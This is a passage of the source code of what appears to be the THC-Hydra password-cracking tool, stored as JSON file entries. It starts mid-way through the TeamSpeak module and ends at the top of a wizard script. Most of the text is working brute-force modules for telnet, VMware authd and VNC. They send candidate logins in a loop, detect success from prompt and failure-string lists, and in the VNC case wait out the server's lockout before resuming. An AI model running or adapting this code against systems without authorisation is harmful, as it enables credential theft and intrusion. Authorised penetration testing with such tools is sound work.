strcpy((char *)&teamspeak.client, \"TeamSpeak\");\n\n teamspeak.oslen = 11;\n strcpy((char *)&teamspeak.os, \"Linux 2.6.9\");\n\n memcpy(&teamspeak.misc, \"\\x02\\x00\\x00\\x00\\x20\\x00\\x3c\\x00\\x01\\x02\", 10);\n\n teamspeak.userlen = strlen(login);\n strncpy((char *)&teamspeak.user, login, 29);\n\n teamspeak.passlen = strlen(pass);\n strncpy((char *)&teamspeak.pass, pass, 29);\n\n teamspeak.loginlen = 0;\n strcpy((char *)&teamspeak.login, \"\");\n\n#ifdef HAVE_ZLIB\n teamspeak.crc = crc32(0L, (const Bytef *)&teamspeak, sizeof(struct team_speak));\n#else\n teamspeak.crc = crc32(&teamspeak, sizeof(struct team_speak));\n#endif\n\n if (hydra_send(s, (char *)&teamspeak, sizeof(struct team_speak), 0) < 0) {\n return 3;\n }\n\n if (hydra_data_ready_timed(s, 5, 0) > 0) {\n hydra_recv(s, (char *)buf, sizeof(buf));\n if (buf[0x58] == 1) {\n hydra_report_found_host(port, ip, \"teamspeak\", fp);\n hydra_completed_pair_found();\n }\n if (buf[0x4B] != 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n } else {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 1;\n}\n\nvoid service_teamspeak(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_TEAMSPEAK;\n\n hydra_register_socket(sp);\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n run = 3;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n // if (sock >= 0)\n // sock = hydra_disconnect(sock);\n // usleepn(300);\n if (sock < 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_udp(ip, myport);\n port = myport;\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n }\n next_run = start_teamspeak(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_teamspeak_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-telnet.c", "content": "#include \"hydra-mod.h\"\n#include \"hydra-telnet.h\"\n#include \n\nchar *telcmds[] = {\n \"EOF\", \"SUSP\", \"ABORT\", \"EOR\",\n \"SE\", \"NOP\", \"DMARK\", \"BRK\", \"IP\", \"AO\", \"AYT\", \"EC\",\n \"EL\", \"GA\", \"SB\", \"WILL\", \"WONT\", \"DO\", \"DONT\", \"IAC\", 0,\n};\n\nextern char *HYDRA_EXIT;\nchar *buf;\nint32_t no_line_mode;\n\n/* Comprehensive failure detection - merged from all provided patterns */\nstatic int is_failure(const char *buffer) {\n char temp[4096];\n strncpy(temp, buffer, sizeof(temp) - 1);\n temp[sizeof(temp) - 1] = 0;\n make_to_lower(temp);\n\n if (strstr(temp, \"incorrect\") != NULL ||\n strstr(temp, \"invalid\") != NULL ||\n strstr(temp, \"failed\") != NULL ||\n strstr(temp, \"denied\") != NULL ||\n strstr(temp, \"bad password\") != NULL ||\n strstr(temp, \"authentication failed\") != NULL ||\n strstr(temp, \"login failed\") != NULL ||\n strstr(temp, \"login incorrect\") != NULL ||\n strstr(temp, \"access denied\") != NULL ||\n strstr(temp, \"wrong\") != NULL ||\n strstr(temp, \"not allowed\") != NULL ||\n strstr(temp, \"permission denied\") != NULL ||\n strstr(temp, \"unable to authenticate\") != NULL ||\n strstr(temp, \"information incomplete\") != NULL ||\n strstr(temp, \"incorrect user/password\") != NULL ||\n strstr(temp, \"please retry after\") != NULL ||\n strstr(temp, \"bad password, bye-bye\") != NULL ||\n strstr(temp, \"bad password,bye-bye\") != NULL ||\n strstr(temp, \"bad password bye-bye\") != NULL ||\n strstr(temp, \"login failure\") != NULL ||\n strstr(temp, \"user was locked\") != NULL ||\n strstr(temp, \"ip has been blocked\") != NULL ||\n strstr(temp, \"cannot log on\") != NULL ||\n strstr(temp, \"password is incorrect, left\") != NULL ||\n strstr(temp, \"authorization failed\") != NULL ||\n strstr(temp, \"error: authentication\") != NULL ||\n strstr(temp, \"error: user was locked\") != NULL ||\n strstr(temp, \"error: username or password\") != NULL ||\n strstr(temp, \"% bad passwords\") != NULL ||\n strstr(temp, \"% authentication failed\") != NULL ||\n strstr(temp, \"% login failure\") != NULL ||\n strstr(temp, \"bye-bye\") != NULL ||\n strstr(temp, \"can't resolve symbol\") != NULL ||\n strstr(temp, \"too many\") != NULL ||\n strstr(temp, \"закрыт\") != NULL ||\n strstr(temp, \"local: authentication failure\") != NULL ||\n strstr(temp, \"please try it again\") != NULL ||\n strstr(temp, \"username or password error\") != NULL ||\n strstr(temp, \"user name or password is wrong\") != NULL) {\n return 1;\n }\n return 0;\n}\n\nint32_t start_telnet(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[300];\n int32_t password_prompt_seen = 0;\n int32_t username_prompt_seen = 0;\n int32_t password_only = 0;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n /* Read initial banners after negotiation to detect prompt type */\n while ((buf = hydra_receive_line(s)) != NULL) {\n make_to_lower(buf);\n\n /* Early success detection */\n if (strchr(buf, '/') != NULL || strchr(buf, '>') != NULL || strchr(buf, '%') != NULL ||\n strchr(buf, '$') != NULL || strchr(buf, '#') != NULL) {\n hydra_report_found_host(port, ip, \"telnet\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n\n /* Enhanced password prompt detection (multilingual + variants) \n * Re-added: \"ennwort\" (German Kennwort) and \"asscode\" per vanhauser-thc request */\n if (hydra_strcasestr(buf, \"asswor\") != NULL || \n hydra_strcasestr(buf, \"asscode\") != NULL ||\n hydra_strcasestr(buf, \"ennwort\") != NULL ||\n strstr(buf, \"passwd:\") != NULL || strstr(buf, \"pass:\") != NULL ||\n strstr(buf, \"pwd:\") != NULL || strstr(buf, \"pin:\") != NULL ||\n strstr(buf, \"пароль:\") != NULL || strstr(buf, \"contraseña:\") != NULL ||\n strstr(buf, \"enter password\") != NULL || strstr(buf, \"password for\") != NULL) {\n password_prompt_seen = 1;\n }\n\n /* Enhanced username/login prompt detection */\n if ((strstr(buf, \"ogin:\") != NULL && strstr(buf, \"last login\") == NULL) ||\n strstr(buf, \"sername:\") != NULL || strstr(buf, \"user:\") != NULL ||\n strstr(buf, \"login:\") != NULL || strstr(buf, \"user id:\") != NULL ||\n strstr(buf, \"userid:\") != NULL || strstr(buf, \"account:\") != NULL ||\n strstr(buf, \"логин:\") != NULL || strstr(buf, \"user access verification\") != NULL ||\n strstr(buf, \"name:\") != NULL || strstr(buf, \"user name:\") != NULL) {\n username_prompt_seen = 1;\n }\n\n free(buf);\n\n if (password_prompt_seen && !username_prompt_seen) {\n password_only = 1;\n break;\n }\n if (username_prompt_seen) {\n break;\n }\n }\n\n /* Send username only if not in password-only mode */\n if (!password_only) {\n sprintf(buffer, \"%.250s\\r\", login);\n if (no_line_mode) {\n int32_t i;\n for (i = 0; i < strlen(buffer); i++) {\n if (buffer[i] == '\\r') {\n send(s, \"\\r\\0\", 2, 0);\n } else {\n send(s, &buffer[i], 1, 0);\n }\n usleepn(20);\n }\n } else {\n if (hydra_send(s, buffer, strlen(buffer) + 1, 0) < 0)\n return 1;\n }\n\n /* Wait for password prompt after sending username */\n int32_t i = 0;\n do {\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n\n if (strchr(buf, '/') != NULL || strchr(buf, '>') != NULL || strchr(buf, '%') != NULL ||\n strchr(buf, '$') != NULL || strchr(buf, '#') != NULL) {\n hydra_report_found_host(port, ip, \"telnet\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n\n (void)make_to_lower(buf);\n \n /* Check for password prompt - includes ennwort and asscode */\n if (hydra_strcasestr(buf, \"asswor\") != NULL || \n hydra_strcasestr(buf, \"asscode\") != NULL || \n hydra_strcasestr(buf, \"ennwort\") != NULL)\n i = 1;\n\n if (i == 0 && ((strstr(buf, \"ogin:\") != NULL && strstr(buf, \"last login\") == NULL) ||\n strstr(buf, \"sername:\") != NULL)) {\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n }\n free(buf);\n } while (i == 0);\n }\n\n /* Send password */\n sprintf(buffer, \"%.250s\\r\", pass);\n if (no_line_mode) {\n int32_t i;\n for (i = 0; i < strlen(buffer); i++) {\n if (buffer[i] == '\\r') {\n send(s, \"\\r\\0\", 2, 0);\n } else {\n send(s, &buffer[i], 1, 0);\n }\n usleepn(20);\n }\n } else {\n if (hydra_send(s, buffer, strlen(buffer) + 1, 0) < 0)\n return 1;\n }\n\n /* Response handling after password */\n while ((buf = hydra_receive_line(s)) != NULL) {\n make_to_lower(buf);\n\n /* Success detection */\n if ((miscptr != NULL && strstr(buf, miscptr) != NULL) ||\n (miscptr == NULL && !is_failure(buf) &&\n (strchr(buf, '/') != NULL || strchr(buf, '>') != NULL ||\n strchr(buf, '$') != NULL || strchr(buf, '#') != NULL ||\n strchr(buf, '%') != NULL ||\n (buf[1] == '\\xfd' && buf[2] == '\\x18')))) {\n hydra_report_found_host(port, ip, \"telnet\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n\n /* Failure detection using comprehensive patterns */\n if (is_failure(buf)) {\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n }\n\n /* Re-prompt for password -> try next password (includes ennwort/asscode) */\n if (hydra_strcasestr(buf, \"asswor\") != NULL || \n hydra_strcasestr(buf, \"asscode\") != NULL ||\n hydra_strcasestr(buf, \"ennwort\") != NULL ||\n strstr(buf, \"passwd:\") != NULL ||\n strstr(buf, \"pass:\") != NULL || strstr(buf, \"pwd:\") != NULL) {\n hydra_completed_pair();\n free(buf);\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n sprintf(buffer, \"%.250s\\r\", pass);\n if (no_line_mode) {\n int32_t i;\n for (i = 0; i < strlen(buffer); i++) {\n if (buffer[i] == '\\r') {\n send(s, \"\\r\\0\", 2, 0);\n } else {\n send(s, &buffer[i], 1, 0);\n }\n usleepn(20);\n }\n } else {\n hydra_send(s, buffer, strlen(buffer) + 1, 0);\n }\n continue;\n }\n\n /* Re-prompt for login -> restart entire pair */\n if (strstr(buf, \"ogin:\") != NULL || strstr(buf, \"sername:\") != NULL) {\n free(buf);\n hydra_completed_pair();\n return 2;\n }\n\n free(buf);\n }\n\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n}\n\nvoid service_telnet(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1, fck;\n int32_t myport = PORT_TELNET, mysslport = PORT_TELNET_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n if (miscptr != NULL)\n make_to_lower(miscptr);\n\n while (1) {\n int32_t first = 0;\n int32_t old_waittime = waittime;\n\n switch (run) {\n case 1: /* connect and init */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n no_line_mode = 0;\n first = 0;\n\n if ((options & OPTION_SSL) == 0) {\n if (port != 0) myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0) mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n if ((buf = hydra_receive_line(sock)) == NULL) {\n hydra_report(stderr, \"[ERROR] Not a TELNET protocol or service shutdown\\n\");\n hydra_child_exit(2);\n }\n\n if (hydra_strcasestr(buf, \"ress ENTER\") != NULL) {\n hydra_send(sock, \"\\r\\n\", 2, 0);\n free(buf);\n if ((buf = hydra_receive_line(sock)) == NULL) {\n hydra_report(stderr, \"[ERROR] Not a TELNET protocol or service shutdown\\n\");\n hydra_child_exit(2);\n }\n }\n\n if (hydra_strcasestr(buf, \"login\") != NULL || hydra_strcasestr(buf, \"sername:\") != NULL) {\n waittime = 6;\n if (debug)\n hydra_report(stdout, \"DEBUG: waittime set to %d\\n\", waittime);\n }\n\n /* Telnet option negotiation */\n do {\n unsigned char *buf2 = (unsigned char *)buf;\n while (*buf2 == IAC) {\n if (first == 0) {\n if (debug)\n hydra_report(stdout, \"DEBUG: requested line mode\\n\");\n fck = write(sock, \"\\xff\\xfb\\x22\", 3); /* WILL LINEMODE */\n first = 1;\n }\n if ((buf[1] == '\\xfc' || buf[1] == '\\xfe') && buf2[2] == '\\x22') {\n no_line_mode = 1;\n if (debug)\n hydra_report(stdout, \"DEBUG: TELNETD peer does not like linemode!\\n\");\n }\n if (buf2[2] != '\\x22') {\n if (buf2[1] == WILL || buf2[1] == WONT)\n buf2[1] = DONT;\n else if (buf2[1] == DO || buf2[1] == DONT)\n buf2[1] = WONT;\n fck = write(sock, buf2, 3);\n }\n buf2 += 3;\n }\n if (buf2 != (unsigned char *)buf) {\n free(buf);\n buf = hydra_receive_line(sock);\n } else {\n buf[0] = 0;\n }\n if (buf != NULL && buf[0] != 0 && (unsigned char)buf[0] != IAC)\n make_to_lower(buf);\n } while (buf != NULL && (unsigned char)buf[0] == IAC &&\n hydra_strcasestr(buf, \"ogin:\") == NULL &&\n hydra_strcasestr(buf, \"sername:\") == NULL);\n\n free(buf);\n waittime = old_waittime;\n next_run = 2;\n break;\n\n case 2: /* cracking */\n next_run = start_telnet(sock, ip, port, options, miscptr, fp);\n break;\n\n case 3: /* exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_telnet_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n return 0;\n}\n\nvoid usage_telnet(const char *service) {\n printf(\"Module telnet is optionally taking the string which is displayed after\\n\"\n \"a successful login (case insensitive), useful if default detection has false positives.\\n\\n\"\n \"This improved version features:\\n\"\n \" - Automatic password-only mode detection and handling (e.g., Cisco, embedded devices)\\n\"\n \" - Multilingual prompt support (English, German, Russian, Spanish, etc.)\\n\"\n \" - Extensive failure message detection to avoid false positives\\n\"\n \"For password-only servers, use: hydra -l \\\"\\\" -P passwords.txt ip telnet\\n\");\n}\n" }, { "path": "hydra-telnet.h", "content": "#ifndef HYDRA_TELNET_DEFS_H\n#define HYDRA_TELNET_DEFS_H\n\n#define IAC 255 /* interpret as command: */\n#define DONT 254 /* you are not to use option */\n#define DO 253 /* please, you use option */\n#define WONT 252 /* I won't use option */\n#define WILL 251 /* I will use option */\n#define SB 250 /* interpret as subnegotiation */\n#define GA 249 /* you may reverse the line */\n#define EL 248 /* erase the current line */\n#define EC 247 /* erase the current character */\n#define AYT 246 /* are you there */\n#define AO 245 /* abort output--but let prog finish */\n#define IP 244 /* interrupt process--permanently */\n#define BREAK 243 /* break */\n#define DM 242 /* data mark--for connect. cleaning */\n#define NOP 241 /* nop */\n#define SE 240 /* end sub negotiation */\n#define EOR 239 /* end of record (transparent mode) */\n#define ABORT 238 /* Abort process */\n#define SUSP 237 /* Suspend process */\n#define xEOF 236 /* End of file: EOF is already used... */\n#define SYNCH 242 /* for telfunc calls */\nextern char *telcmds[];\n#endif\n" }, { "path": "hydra-time.c", "content": "#include \"hydra.h\"\n\n#ifndef _WIN32\n#include \nint32_t sleepn(time_t seconds) {\n struct timespec ts;\n ts.tv_sec = seconds;\n ts.tv_nsec = 0;\n return nanosleep(&ts, NULL);\n}\nint32_t usleepn(uint64_t milisec) {\n struct timespec ts;\n ts.tv_sec = milisec / 1000;\n ts.tv_nsec = (milisec % 1000) * 1000000L;\n return nanosleep(&ts, NULL);\n}\n\n#else\n\n#include \nint32_t sleepn(uint32_t seconds) { return SleepEx(milisec * 1000, TRUE); }\n\nint32_t usleepn(uint32_t milisec) { return SleepEx(milisec, TRUE); }\n#endif\n" }, { "path": "hydra-vmauthd.c", "content": "// This plugin was written by david@\n//\n// This plugin is written for VMware Authentication Daemon\n//\n\n#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\n\nchar *buf;\n\nint32_t start_vmauthd(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\\\"\\\"\";\n char *login, *pass, buffer[300];\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n while (hydra_data_ready(s) > 0) {\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n free(buf);\n }\n\n sprintf(buffer, \"USER %.250s\\r\\n\", login);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n if (strncmp(buf, \"331 \", 4) != 0) {\n hydra_report(stderr, \"[ERROR] vmware authd protocol or service shutdown: %s\\n\", buf);\n free(buf);\n return (3);\n }\n free(buf);\n\n sprintf(buffer, \"PASS %.250s\\r\\n\", pass);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n\n // fprintf(stderr, \"%s\\n\", buf);\n // 230 User test logged in.\n // 530 Login incorrect.\n\n if (strncmp(buf, \"230 \", 4) == 0) {\n hydra_report_found_host(port, ip, \"vmauthd\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_vmauthd(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_VMAUTHD, mysslport = PORT_VMAUTHD_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n buf = hydra_receive_line(sock);\n // fprintf(stderr, \"%s\\n\",buf);\n // 220 VMware Authentication Daemon Version 1.00\n // 220 VMware Authentication Daemon Version 1.10: SSL Required\n // 220 VMware Authentication Daemon Version 1.10: SSL Required,\n // ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC ,\n\n if (buf == NULL || strstr(buf, \"220 VMware Authentication Daemon Version \") == NULL) {\n /* check the first line */\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an vmware authd protocol or service shutdown: %s\\n\", buf);\n hydra_child_exit(2);\n }\n if ((strstr(buf, \"Version 1.00\") == NULL) && (strstr(buf, \"Version 1.10\") == NULL)) {\n hydra_report(stderr,\n \"[ERROR] this vmware authd protocol is not supported, \"\n \"please report: %s\\n\",\n buf);\n free(buf);\n hydra_child_exit(2);\n }\n // by default this service is waiting for ssl connections\n if (strstr(buf, \"SSL Required\") != NULL) {\n if ((options & OPTION_SSL) == 0) {\n // reconnecting using SSL\n if (hydra_connect_to_ssl(sock, hostname) == -1) {\n free(buf);\n hydra_report(stderr, \"[ERROR] Can't use SSL\\n\");\n hydra_child_exit(2);\n }\n }\n }\n free(buf);\n\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_vmauthd(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n break;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_vmauthd_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-vnc.c", "content": "\n/*\n * Tested against RealVNC P4.6.0 using 3.3 and 4.1 RFB\n * proto with None and VLC auth (david@)\n *\n */\n\n#include \"d3des.h\"\n#include \"hydra-mod.h\"\n\n#define CHALLENGESIZE 16\n\n// for RFB 003.003 & 003.005\n#define RFB33 1\n// for RFB 3.7 and onwards\n#define RFB37 2\n\nint32_t vnc_client_version = RFB33;\nint32_t failed_auth = 0;\n\nextern char *HYDRA_EXIT;\nstatic char *buf;\n\n/*\n * Encrypt CHALLENGESIZE bytes in memory using a password.\n * Ripped from vncauth.c\n */\n\nvoid vncEncryptBytes(unsigned char *bytes, char *passwd) {\n unsigned char key[8];\n int32_t i;\n\n /* key is simply password padded with nulls */\n for (i = 0; i < 8; i++) {\n if (i < strlen(passwd)) {\n key[i] = passwd[i];\n } else {\n key[i] = 0;\n }\n }\n deskey(key, EN0);\n for (i = 0; i < CHALLENGESIZE; i += 8) {\n des(bytes + i, bytes + i);\n }\n}\n\nint32_t start_vnc(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *pass;\n unsigned char buf2[CHALLENGESIZE + 4];\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n recv(s, buf2, CHALLENGESIZE + 4, 0);\n\n if (vnc_client_version == RFB37) {\n int32_t i;\n\n // fprintf(stderr,\"number of security types supported: %d\\n\", buf2[0]);\n if (buf2[0] == 0 || buf2[0] > CHALLENGESIZE + 4) {\n hydra_report(stderr, \"[ERROR] VNC server connection failed\\n\");\n hydra_child_exit(0);\n }\n\n for (i = 1; i <= buf2[0]; i++) {\n // fprintf(stderr,\"sec type %u\\n\",buf2[i]);\n // check if weak security types are available\n if (buf2[i] <= 0x2) {\n buf2[3] = buf2[i];\n break;\n }\n }\n }\n // supported security type\n switch (buf2[3]) {\n case 0x0:\n hydra_report(stderr, \"[ERROR] VNC server told us to quit %c\\n\", buf2[3]);\n hydra_child_exit(0);\n break;\n case 0x1:\n hydra_report(fp, \"VNC server does not require authentication.\\n\");\n if (fp != stdout)\n hydra_report(stdout, \"VNC server does not require authentication.\\n\");\n hydra_report_found_host(port, ip, \"vnc\", fp);\n hydra_completed_pair_found();\n hydra_child_exit(2);\n break;\n case 0x2:\n // VNC security type supported is the only type supported for now\n if (vnc_client_version == RFB37) {\n sprintf(buf, \"%c\", 0x2);\n if (hydra_send(s, buf, strlen(buf), 0) < 0) {\n return 1;\n }\n // get authentication challenge from server\n if (recv(s, buf2, CHALLENGESIZE, 0) == -1)\n return 1;\n // send response\n vncEncryptBytes(buf2, pass);\n if (hydra_send(s, (char *)buf2, CHALLENGESIZE, 0) < 0) {\n return 1;\n }\n } else {\n // in old proto, challenge is following the security type\n vncEncryptBytes((unsigned char *)buf2 + 4, pass);\n if (hydra_send(s, (char *)buf2 + 4, CHALLENGESIZE, 0) < 0) {\n return 1;\n }\n }\n break;\n default:\n hydra_report(stderr, \"[ERROR] unknown VNC security type 0x%x\\n\", buf2[3]);\n hydra_child_exit(2);\n }\n\n // check security result value\n recv(s, buf, 4, 0);\n if (buf == NULL)\n return 1;\n\n switch (buf[3]) {\n case 0x0:\n hydra_report_found_host(port, ip, \"vnc\", fp);\n hydra_completed_pair_found();\n free(buf);\n failed_auth = 0;\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n case 0x1:\n free(buf);\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Authentication failed for password %s\\n\", pass);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n default:\n hydra_report(stderr, \"[ERROR] unknown VNC server security result %d\\n\", buf[3]);\n free(buf);\n return 1;\n }\n\n return 1; /* never reached */\n}\n\nvoid service_vnc(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_VNC, mysslport = PORT_VNC_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n usleepn(300);\n buf = hydra_receive_line(sock);\n\n if (buf == NULL || (strncmp(buf, \"RFB\", 3) != 0)) { /* check the first line */\n hydra_report(stderr, \"[ERROR] Not a VNC protocol or service shutdown: %s\\n\", buf);\n hydra_child_exit(2);\n }\n if (strstr(buf, \" security failures\") != NULL) { /* check the first line */\n /*\n VNC has a 'blacklisting' scheme that blocks an IP address after five\n unsuccessful connection attempts. The IP address is initially blocked\n for ten seconds, but this doubles for each unsuccessful attempt\n thereafter. A successful connection from an IP address resets the\n blacklist timeout. This is built in to VNC Server and does not rely\n on operating system support.\n */\n failed_auth++;\n hydra_report(stderr, \"VNC server reported too many authentication \"\n \"failures, have to wait some seconds ...\\n\");\n sleep(12 * failed_auth);\n free(buf);\n next_run = 1;\n break;\n }\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Server banner is %s\\n\", buf);\n if (((strstr(buf, \"RFB 005.000\") != NULL) || (strstr(buf, \"RFB 004\") != NULL) || (strstr(buf, \"RFB 003.007\") != NULL) || (strstr(buf, \"RFB 003.008\") != NULL))) {\n // using proto version 003.007 to talk to server 005.xxx and 004.xxx\n // same for 3.7 and 3.8\n vnc_client_version = RFB37;\n free(buf);\n buf = strdup(\"RFB 003.007\\n\");\n } else {\n // for RFB 3.3 and fake 3.5\n vnc_client_version = RFB33;\n free(buf);\n buf = strdup(\"RFB 003.003\\n\");\n }\n hydra_send(sock, buf, strlen(buf), 0);\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_vnc(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 4:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_vnc_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-wizard.sh", "content": "#!/bin/sh\n#\n# based on a script by Shivang Desai \n#\necho\necho \"Welcome to the Hydra 